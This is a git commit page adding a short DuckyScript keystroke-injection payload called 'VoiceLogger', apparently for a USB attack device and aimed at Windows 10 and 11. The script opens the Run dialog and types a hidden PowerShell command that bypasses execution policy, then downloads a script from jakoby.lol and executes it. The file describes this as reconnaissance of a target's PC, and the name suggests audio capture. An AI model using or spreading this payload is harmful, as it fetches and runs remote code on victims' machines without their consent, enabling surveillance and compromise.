Create VoiceLogger.txt
This commit is contained in:
parent
4be93eef5b
commit
85035bb3bb
1 changed files with 12 additions and 0 deletions
12
Payloads/VoiceLogger/VoiceLogger.txt
Normal file
12
Payloads/VoiceLogger/VoiceLogger.txt
Normal file
|
@ -0,0 +1,12 @@
|
||||||
|
REM Title: VoiceLogger
|
||||||
|
|
||||||
|
REM Author: I am Jakoby
|
||||||
|
|
||||||
|
REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
|
||||||
|
|
||||||
|
REM Target: Windows 10, 11
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/voiceLogger | iex
|
||||||
|
ENTER
|
Loading…
Reference in a new issue